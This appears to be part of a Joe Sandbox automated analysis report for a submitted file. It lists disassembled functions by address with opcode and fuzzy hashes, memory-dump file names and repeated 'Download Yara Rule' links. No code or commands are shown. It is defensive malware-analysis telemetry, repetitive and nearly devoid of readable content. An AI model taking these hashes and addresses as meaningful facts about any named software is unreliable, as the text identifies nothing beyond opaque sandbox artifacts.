                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                • Instruction ID: 66d825925ea6191e2be1d9ca0a8b702939ee19e5c8365a77854c253f2ed75e26
                                • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                • Instruction Fuzzy Hash: E2021170A083098FDB15DF29C8803A9B7E1EFE5344F15D72DEAD9A7362D371E8858A41
                                Function 00EE66C8 Relevance: .4, Instructions: 418COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                • Instruction ID: 0e0e6bd4a99fd892092a837b62d47c02b45df8cc38fd0a63c418113292bb33ad
                                • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                • Instruction Fuzzy Hash: 69F18AA220C6E14BC70D8A1588B08BD7FD29FA9201F0E86ADFDD71F383D924DA01DB51
                                Function 00F2B308 Relevance: .4, Instructions: 415COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                • Instruction ID: 40d5bdaeaae866b4940b44250c0a155f7507c08187a35ba83663ee50cfdb52d6
                                • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                • Instruction Fuzzy Hash: 48D18873F10A254BEB08CE99DC923ADB6E2EBD8350F19413ED916F7385D6B89D018790
                                Function 00F10B88 Relevance: .4, Instructions: 378COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                • Instruction ID: cbfc0069feed86a88745e1458d940a4d5736845c079545c08ef5518b9561f7a3
                                • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                • Instruction Fuzzy Hash: 6CD1E572E002198FDF24CF98D8817EEB7B1FF49320F144229E915A7291DB7459C6EB91
                                Function 00EFB8A8 Relevance: .4, Instructions: 376COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                • Instruction ID: 1321535bc8b5f8d2632711d80d999249b242d9fb2270736b42df4b84bbdcf4a9
                                • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                • Instruction Fuzzy Hash: 2D026974E006598FCF26CFA8C4905EDBBB6FF89310F588159E8997B355C730AA91CB50
                                Function 00EFBD68 Relevance: .4, Instructions: 372COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                • Instruction ID: 64fecafe73b14645e04dd868593d2a95c6ce2a6e17ae5529391d2afb3ef607d2
                                • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                • Instruction Fuzzy Hash: 11020275E00619CFCB15CF98C8809ADB7B6FF88350F258569E809BB355D731AA92CF90
                                Function 00F1A648 Relevance: .3, Instructions: 339COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                • Instruction ID: 5ea4272bbbf305dff40db0ab9a5e5cd12d075d41eb0fe1e43effa855164ce72e
                                • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                • Instruction Fuzzy Hash: 29C16E76E29B814BD713873DD8022A5F395AFF7290F15D72EFCE472982FB2096818204
                                Function 00F0AD38 Relevance: .3, Instructions: 302COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                • Instruction ID: 1e7008d1cd4936021ec7d1fba8c061e707f452058fa68cec2cb900db3ea3bac0
                                • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                • Instruction Fuzzy Hash: 66D15670A00B41CFD721CF29C894B67B7E0BB49314F14892ED89A8BB91DB35F845EB91
                                Function 00EFD720 Relevance: .3, Instructions: 295COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                • Instruction ID: 4fa6a8edd56f9f981a58f5c20bec0da8fceb0ab4a7da7f0b866d6a5accc36bd5
                                • Opcode Fuzzy Hash: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                • Instruction Fuzzy Hash: 41D15DB010C3848FD3148F11C4A472BBFE1AF95708F18999EE5D91B391C7BA9A48DF92
                                Function 00EE45A8 Relevance: .3, Instructions: 291COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                • Instruction ID: 4e8acddbed8f09bd8e34e5f39beec5c2c25184473b77916bea9970a413b44b46
                                • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                • Instruction Fuzzy Hash: 83B18F72A083555BD308CF25C89136BF7E2EFC8310F1AC93EB899A7291D774D9419A82
                                Function 00ED1D78 Relevance: .3, Instructions: 291COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                • Instruction ID: fabc65084114eb2264d0b6387bec9c2e3a92cb6ae40c674bc9274fca387d76c0
                                • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                • Instruction Fuzzy Hash: 63B19072A083115BD308CF25C89176BF7E2EFC8310F1AC93EE89997291D778D9459A82
                                Function 00ED2138 Relevance: .3, Instructions: 284COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                • Instruction ID: e9efcc83d5bed9889f87fb713a4218ab6c42be52da475b3ba73c6e32e0876374
                                • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                • Instruction Fuzzy Hash: 2AB1F571A097118FD706EE39C481219F7E1EFE6280F51D72EE9A5B7762EB31E8818740
                                Function 00F11EE8 Relevance: .3, Instructions: 274COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
